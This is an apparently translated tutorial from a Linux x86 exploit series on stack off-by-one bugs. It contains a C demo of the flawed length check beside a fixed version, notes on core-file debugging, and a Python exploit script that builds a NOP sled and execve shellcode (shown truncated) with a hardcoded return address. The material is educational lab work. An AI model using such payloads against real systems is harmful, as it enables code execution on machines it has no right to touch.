Three off-by-one vulnerabilities of Linux (x86) exploit series (stack based)


Off-by-one Vulnerability (stack based)

Original address: https://bbs.pediy.com/thread-216954.htm

What is off by one?

Copying a source string into a destination buffer can result in an off-by-one when:

1. The source string length equals the destination buffer length.

When the source string length equals the destination buffer length, a single null byte is copied past the end of the destination buffer. Because the buffer is located on the stack, that null byte can overwrite the least significant byte (LSB) of the caller's saved EBP, which can lead to arbitrary code execution.
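The following C program is an added example, not the original post's vuln.c (which is not reproduced on this page): it shows the length check that lets an equal-length string through and the single NUL that the copy then writes one byte past the buffer, next to the corrected check. The struct layout, the 16-byte buffer size and the sentinel byte (standing in for the low byte of the saved EBP) are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 16

/* Constructed layout: the sentinel byte sits right after buf, standing in for the
 * low byte of the saved EBP that follows a stack buffer in the real program. */
struct probe {
    char buf[BUF_SIZE];
    unsigned char sentinel;
};

/* Vulnerable: '>' lets a source of exactly BUF_SIZE characters through, and the
 * '<=' loop then copies its terminating NUL into the byte after buf. */
static int copy_vulnerable(struct probe *p, const char *src) {
    size_t len = strlen(src);
    if (len > BUF_SIZE)
        return 0;
    for (size_t i = 0; i <= len; i++)
        p->buf[i] = src[i];
    return 1;
}

/* Fixed: reject anything that leaves no room for the terminator, and copy with an
 * explicit bound so the NUL always lands inside buf. */
static int copy_fixed(struct probe *p, const char *src) {
    size_t len = strlen(src);
    if (len >= BUF_SIZE)
        return 0;
    memcpy(p->buf, src, len);
    p->buf[len] = '\0';
    return 1;
}

/* Feeds a BUF_SIZE-character source to one copy routine and reports whether the
 * sentinel survived (1) or was zeroed by the off-by-one NUL write (0). */
static int sentinel_intact(int (*copy)(struct probe *, const char *)) {
    struct probe p;
    char src[BUF_SIZE + 1];
    memset(src, 'A', BUF_SIZE);
    src[BUF_SIZE] = '\0';
    p.sentinel = 0xFF;
    copy(&p, src);
    return p.sentinel == 0xFF;
}

int main(void) {
    printf("vulnerable copy keeps sentinel: %d\n", sentinel_intact(copy_vulnerable));
    printf("fixed copy keeps sentinel: %d\n", sentinel_intact(copy_fixed));
    return 0;
}
```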

As always, that is enough definition; let's look at the off-by-one bug code!

I won't paste it all here; read the original, I'll only explain parts of it.

The original article's explanation is already very clear, so I will only mention the pitfalls I ran into while debugging.

The first is core-file debugging. The compile command is: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c

Note that the -g option is not used, so the binary is not built with debug information; without it there is no way to break on source lines in gdb, so you can only debug with the core file.

The author also gives the core-file debugging method, but when I ran python exp.py no core file appeared. After looking it up, I checked with ulimit -c and found the value was 0; apparently the system default (?) does not allow core files to be created. I changed the limit with ulimit -c 1000.

After the change, the core file is generated normally.

Another pitfall: the buf address seen while debugging under gdb is not the same as the buf address when the binary runs normally; the offset changes, so pay special attention to it.

As usual, here is the exp.py I got working.

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

# Spawn a shell.
# execve(/bin/sh), size 28 bytes.
# The shellcode string is cut off in this copy of the page; the remaining bytes are not shown here.
scode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"

# Return address found by debugging the core file (remember it differs under gdb).
ret_addr = 0xbffff426

# Endianness conversion: 32-bit little-endian unsigned int.
# ("<I", not "<i": the signed format rejects an address above 0x7fffffff.)
def conv(num):
    return struct.pack("<I", num)

# buf = junk + RA + NOPs + shellcode + junk
buf = b"A" * 68
buf += conv(ret_addr)
buf += b"\x90" * 30
buf += scode
buf += b"A" * 126

print("Calling vulnerable program")
call(["./vuln", buf])

Virtual machine Installation: Ubuntu 12.04 (x86)

Vulnerability Code:
